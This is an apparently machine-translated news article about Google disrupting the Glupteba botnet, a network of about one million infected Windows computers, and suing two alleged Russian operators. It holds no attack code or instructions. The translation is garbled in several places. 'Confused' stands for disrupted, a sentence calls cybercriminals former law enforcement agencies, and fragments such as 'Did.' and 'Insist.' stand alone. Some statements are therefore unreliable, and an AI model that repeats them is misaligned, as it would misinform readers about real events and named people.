Google sues two Russians allegedly operating the botnet 'Glupteba', which bundles one million devices

Google announced on December 7, 2021 that it has confused the infrastructure of the botnet Glupteba, which includes about one million Windows computers, and has filed a lawsuit against two Russians who appear to be the operators. The series of moves has been pointed out as an example of a high-tech company where the security of the Internet is essential for business, pursuing cybercriminals who used to be law enforcement agencies.

New action to combat cyber crime

https://blog.google/technology/safety-security/new-action-combat-cyber-crime/

Disrupting the Glupteba operation
https://blog.google/threat-analysis-group/disrupting-glupteba-operation/

Google disrupted the Glupteba botnet used to steal personal information and mine cryptocurrency --The Washington Post
https://www.washingtonpost.com/technology/2021/12/07/google-glupteba-botnet-hack/

Google announces lawsuit, technical action against blockchain botnet Glupteba | ZDNet
https://www.zdnet.com/article/google-announces-lawsuit-and-action-against-blockchain-botnet-glupteba/

Google reported in an official blog on December 7 that 'we have taken action to confuse the botnet'Glupteba', which targets Windows machines and protects itself using blockchain technology.' ..

A botnet is a network of malware-infected computers under the control of malicious actors that steals or scams sensitive information through infected devices. Glupteba is a botnet that has been tracked by law enforcement agencies and security researchers for many years since it was discovered in 2011.

The malware used by Glupteba is said to infect the target computer through suspicious free download sites. The image below is an example of a website that installs the Glupteba malware while pretending to be a free software download site.

In a blog post, Google said, 'As a result of a thorough investigation, the Glupteba botnet contains about 1 million compromised Windows devices worldwide and is growing at a rate of thousands per day. Determined.Glupteba is notorious for stealing user credentials and data, mining crypto assets on infected hosts, and setting up proxy to infect other internet traffic through infected machines and routers. That's it. ' In addition, Glupteba is said to have been in the business of stealing the login information of the Google account and selling it, and selling the access right to the infected device to other hackers.

Google, which has continued to track and investigate Glupteba, has taken technical and legal action in collaboration with industry partners. As a technical action, Google says it has closed 1183 Google accounts, 908 Google cloud projects, 870 Google advertising accounts, and 63 million Google Docs related to Glupteba over the past year. It also reports that it has issued a warning through Google Safe Browsing to 3.5 million users who attempted to download malicious files.

In addition, Google has partnered with Internet infrastructure and hosting providers, including CloudFlare, to shut down Glupteba's servers and set up warning pages to connect to malicious domains in the last few days, disrupting Glupteba's operations. Did. While Google's sabotage appears to have disrupted Glupteba's main chain of command, Glaupteba incorporates backup commands and control mechanism protection systems encoded on the Bitcoin blockchain to quickly recover from the disruption. There is a possibility that it will be done.

In parallel with these technical actions, Google has filed a lawsuit in the Federal District Court for the Southern District of New York against two Russians, Dmitry Starovikov and Alexander Filippov, who appear to be the operators of Glupteba. The two have set up a Google email address account at the same IP address that sent the command to Glupteba, and Google has also confirmed the connection between the website that sells computer data contained in the botnet and the Google account. Insist.

In a blog post, Google said, 'We are working closely with industry and government to fight for better protection of the Internet when Glupteba comes back.' 'Take such positive action. That's important to security. We play our part in understanding, recognizing, and addressing the threats facing the Internet. '

The Washington Post, an American daily newspaper, said on December 6 that Microsoft had 'seized the domain used by a group of hackers based in China, ' and said, 'Companies such as Microsoft and Google have hacked. There is a growing movement to investigate and eliminate hackers, which has traditionally been primarily done by government law enforcement agencies. '